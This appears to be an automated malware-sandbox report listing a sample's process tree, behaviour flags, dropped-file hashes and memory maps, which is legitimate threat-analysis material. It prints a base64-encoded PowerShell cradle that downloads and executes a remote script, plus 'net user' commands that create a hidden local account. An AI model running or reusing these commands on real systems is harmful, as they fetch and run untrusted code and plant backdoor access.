C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES7149.tmpMD5
ec9c9954a08490fcf25d0410a60bf12f
SHA13040027fc18fc7d4c19c3986b6a7fb27963428d2
SHA256f9f6a2f24d18b51a52f871efaf9907140976a9fecb4483dd86792874569cdc10
SHA51263ca3b23a63524b9e14dbbc7d850a47634d0dbf53b1260c30b977de742042b810292c9895bc3bc3e067b6245de9dea30b87b899cf74c62dffdbbb96485e1d108
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
bcac3bbb18f093dbc8e5e76d2675695f
SHA196453f65b41e428937349e6f48fe67d6dfd6a580
SHA256b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
SHA51278c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
42c2a160d2d191e6ffcc1076b4734ee2
SHA1c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
SHA2562b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
SHA5123b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
-
C:\Users\Admin\AppData\Local\Temp\niy0jjqs\niy0jjqs.dllMD5
9677a5b063bfa78ab109c8c5ddd13177
SHA10472c21031c110dbdc606299592f671c577f3ffb
SHA256adc62fb603910972deb6c22bee0a16d08626e1883e6a7b6529d58050796d9c17
SHA512fe966160c0d73d158097c0c0fee842d7a8f3dfcb09ff9c2babd42415ae2e50824937623ca6e1af8c1c56f89910f06ce0b0c5bee2f267a8435434dc3d1b6d6683
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\niy0jjqs\CSC2F104AD658C14F50B898825C301F8E4D.TMPMD5
b41801b370b1537c73680a8c8f6c230a
SHA177ad061d62a4fa4b01d43b65c0c08be0e9e0a91c
SHA256563acaa2adb416491065a99978821e809b308d0e52181ee112ea932ae550e9ea
SHA512c2b6e4011c98adcdbd63a9df7c6231a8f81a4e2b07ab31d5517937a8faf7b21a7aa71df474f2867f421f442de402e210e818b14dc17c6bde90065a8ed517df87
-
\??\c:\Users\Admin\AppData\Local\Temp\niy0jjqs\niy0jjqs.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\niy0jjqs\niy0jjqs.cmdlineMD5
2e4936ddc36f3626faac240f0b9d32cd
SHA1468219dba02cd2a98545172f6d3691e291fab533
SHA25637eac7f8a3e45d12d064cf47b3b25ebdc5f1a98902522b0bb13d80782c4febde
SHA512bde5e721490986627124fb4be8018479745f78fd9d30004e6787d6cce0060ce53dc6ea1c402d3fad9832fbb8a5fc971ca69ccf8e32e6524e30490ffa44c0dccc
-
\Windows\Branding\mediasrv.pngMD5
f357d4e7b83bc0a41c65d97f3e6f50f4
SHA171db3180a8ada6d5d7722c54a5940c3490f78636
SHA256db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
SHA512566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
-
\Windows\Branding\mediasvc.pngMD5
d5de6f599d9807bac2f5a8e751a8c38f
SHA19e70edf56b6a5768fda84232e9c557e750d3631b
SHA25618207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
SHA512e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5
-
memory/348-40-0x0000000000000000-mapping.dmp
-
memory/368-48-0x0000000000000000-mapping.dmp
-
memory/368-67-0x0000000000000000-mapping.dmp
-
memory/372-57-0x0000000000000000-mapping.dmp
-
memory/568-47-0x0000000000000000-mapping.dmp
-
memory/628-55-0x0000000000000000-mapping.dmp
-
memory/676-10-0x0000000000000000-mapping.dmp
-
memory/684-0-0x0000000002220000-0x000000000255D000-memory.dmpFilesize
3.2MB
-
memory/684-65-0x0000000000000000-mapping.dmp
-
memory/684-1-0x0000000002560000-0x0000000002571000-memory.dmpFilesize
68KB
-
memory/684-45-0x0000000000000000-mapping.dmp
-
memory/804-71-0x0000000000000000-mapping.dmp
-
memory/824-70-0x0000000000000000-mapping.dmp
-
memory/848-46-0x0000000000000000-mapping.dmp
-
memory/860-13-0x0000000000000000-mapping.dmp
-
memory/884-117-0x0000000000000000-mapping.dmp
-
memory/1072-54-0x0000000000000000-mapping.dmp
-
memory/1104-64-0x0000000000000000-mapping.dmp
-
memory/1104-44-0x0000000000000000-mapping.dmp
-
memory/1152-76-0x0000000000000000-mapping.dmp
-
memory/1300-34-0x0000000002080000-0x0000000002081000-memory.dmpFilesize
4KB
-
memory/1300-2-0x0000000000000000-mapping.dmp
-
memory/1300-4-0x0000000002570000-0x0000000002571000-memory.dmpFilesize
4KB
-
memory/1300-3-0x000007FEF51D0000-0x000007FEF5BBC000-memory.dmpFilesize
9.9MB
-
memory/1300-5-0x000000001ACD0000-0x000000001ACD1000-memory.dmpFilesize
4KB
-
memory/1300-6-0x00000000020B0000-0x00000000020B1000-memory.dmpFilesize
4KB
-
memory/1300-7-0x00000000024C0000-0x00000000024C1000-memory.dmpFilesize
4KB
-
memory/1300-9-0x000000001C1C0000-0x000000001C1C1000-memory.dmpFilesize
4KB
-
memory/1300-17-0x0000000001F20000-0x0000000001F21000-memory.dmpFilesize
4KB
-
memory/1300-18-0x000000001AA90000-0x000000001AA91000-memory.dmpFilesize
4KB
-
memory/1300-21-0x000000001B580000-0x000000001B581000-memory.dmpFilesize
4KB
-
memory/1300-33-0x0000000002070000-0x0000000002071000-memory.dmpFilesize
4KB
-
memory/1300-35-0x0000000024610000-0x0000000024611000-memory.dmpFilesize
4KB
-
memory/1332-83-0x000007FEF51D0000-0x000007FEF5BBC000-memory.dmpFilesize
9.9MB
-
memory/1332-98-0x0000000000EA0000-0x0000000000EA1000-memory.dmpFilesize
4KB
-
memory/1332-86-0x0000000000990000-0x0000000000991000-memory.dmpFilesize
4KB
-
memory/1332-115-0x000000001AB20000-0x000000001AB21000-memory.dmpFilesize
4KB
-
memory/1332-114-0x0000000019430000-0x0000000019431000-memory.dmpFilesize
4KB
-
memory/1332-107-0x000000001AA90000-0x000000001AA91000-memory.dmpFilesize
4KB
-
memory/1332-106-0x0000000019FB0000-0x0000000019FB1000-memory.dmpFilesize
4KB
-
memory/1332-99-0x00000000011A0000-0x00000000011A1000-memory.dmpFilesize
4KB
-
memory/1332-87-0x0000000000A80000-0x0000000000A81000-memory.dmpFilesize
4KB
-
memory/1332-82-0x0000000000000000-mapping.dmp
-
memory/1332-97-0x0000000000FB0000-0x0000000000FB1000-memory.dmpFilesize
4KB
-
memory/1332-90-0x0000000001160000-0x0000000001161000-memory.dmpFilesize
4KB
-
memory/1332-96-0x0000000000E90000-0x0000000000E91000-memory.dmpFilesize
4KB
-
memory/1332-95-0x0000000000E80000-0x0000000000E81000-memory.dmpFilesize
4KB
-
memory/1360-43-0x0000000000000000-mapping.dmp
-
memory/1504-53-0x0000000000000000-mapping.dmp
-
memory/1512-77-0x0000000000000000-mapping.dmp
-
memory/1528-56-0x0000000000000000-mapping.dmp
-
memory/1616-116-0x0000000000000000-mapping.dmp
-
memory/1620-49-0x0000000000000000-mapping.dmp
-
memory/1640-41-0x0000000000000000-mapping.dmp
-
memory/1640-63-0x0000000000000000-mapping.dmp
-
memory/1660-72-0x0000000000000000-mapping.dmp
-
memory/1664-60-0x0000000000000000-mapping.dmp
-
memory/1664-36-0x0000000000000000-mapping.dmp
-
memory/1668-61-0x0000000000000000-mapping.dmp
-
memory/1668-73-0x0000000000000000-mapping.dmp
-
memory/1668-38-0x0000000000000000-mapping.dmp
-
memory/1716-80-0x0000000000000000-mapping.dmp
-
memory/1720-66-0x0000000000000000-mapping.dmp
-
memory/1736-62-0x0000000000000000-mapping.dmp
-
memory/1740-42-0x0000000000000000-mapping.dmp
-
memory/1748-79-0x0000000000000000-mapping.dmp
-
memory/1844-39-0x0000000000000000-mapping.dmp
-
memory/1908-81-0x0000000000000000-mapping.dmp
-
memory/1908-50-0x0000000000000000-mapping.dmp
-
memory/2016-52-0x0000000000000000-mapping.dmp
-
memory/2036-51-0x0000000000000000-mapping.dmp